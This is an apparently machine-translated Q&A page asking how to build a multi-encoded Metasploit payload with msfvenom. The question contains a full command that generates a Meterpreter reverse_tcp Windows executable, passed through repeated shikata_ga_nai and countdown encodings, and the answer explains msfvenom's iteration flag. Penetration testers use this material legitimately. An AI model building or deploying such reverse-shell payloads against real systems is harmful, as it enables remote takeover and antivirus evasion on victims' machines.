0

在之前版本的 metasploit 中,我们可以使用此代码生成多编码有效负载:

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.217.133
LPORT=444 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 8 -t raw | msfencode -e x86/shikata_ga_nai -c 9 -t exe >payload.exe

但是在新版本中替换了 msfvenom ...我如何通过 msfvenom 制作多编码有效负载?抱歉英语不好

4

1 回答 1

0

您可以通过“msfvenom”在脚本中“替换 msfpayload 和 msfencode”

和“-i”而不是“-c”表示迭代次数或编码有效载荷的时间

你可以输入你的终端

毒液

或者

msfvenom -h

如果你知道 msfpayload & encode,你应该可以毫无问题地使用 msfvenom,机制相同

更多请参考

https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom

希望你找到你要找的东西!

于 2015-08-19T23:07:26.900 回答